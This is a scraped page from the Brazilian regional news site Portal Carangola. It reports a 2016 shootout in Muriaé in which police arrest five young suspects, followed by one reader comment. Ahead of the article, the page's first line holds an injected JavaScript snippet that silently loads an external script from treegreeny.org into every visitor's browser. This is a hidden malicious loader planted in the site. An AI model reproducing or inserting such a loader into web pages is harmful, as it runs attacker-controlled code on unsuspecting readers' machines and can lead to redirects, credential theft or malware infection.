;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 47º BPM – Cinco elementos são presos após tentarem contra a vida de policiais. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

47º BPM – Cinco elementos são presos após tentarem contra a vida de policiais.

armaEm 14/04/16, por volta das 11h22min, na cidade de Muriaé, os militares 3ºSGT PM PIMENTEL e o CB PM DAMIÃO ÂNGELO, após intenso rastreamento por bairros e ruas no distrito do vermelho, abordaram o veículo FIAT/UNO, de cor cinza. No momento da abordagem, dois dos autores efetuaram disparos de arma de fogo contra a guarnição, tendo os militares revidado a injusta agressão. Foram presos os seguintes autores: A.V.O.M.,de 24 anos; W.F.M., de 21 anos; J.N.S., de 18 anos; M.A.O., de 26 anos e P.I.A.S., de 20 anos, este último sendo alvejado e socorrido ao HSP, onde permaneceu internado. Após os disparos, foi detectado que dois autores evadiram a pé, um deles de arma em punho e os demais permaneceram no local da abordagem.

Com o autor P.I.A.S., de 20 anos, foi localizado um revólver cal.38 municiado. Os autores que haviam evadido foram capturados e presos, contudo a arma que se encontrava em poder deles, não foi localizada. Autores e materiais foram conduzidos para a Delegacia de Polícia. Após os trabalhos realizados pela delegacia, os militares mencionados acima foram encaminhados para a sede do 47º BPM para dar andamento nos trabalhos de praxe (APF), juntamente com as armas da carga da PMMG por prática de lesão corporal.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

 

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

One thought on “47º BPM – Cinco elementos são presos após tentarem contra a vida de policiais.

  1. Uma vergonha!!!
    PM se defende e tem a arma apreendida por conta de lesao corporal
    BRASIL PODRE ESSE!!!

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.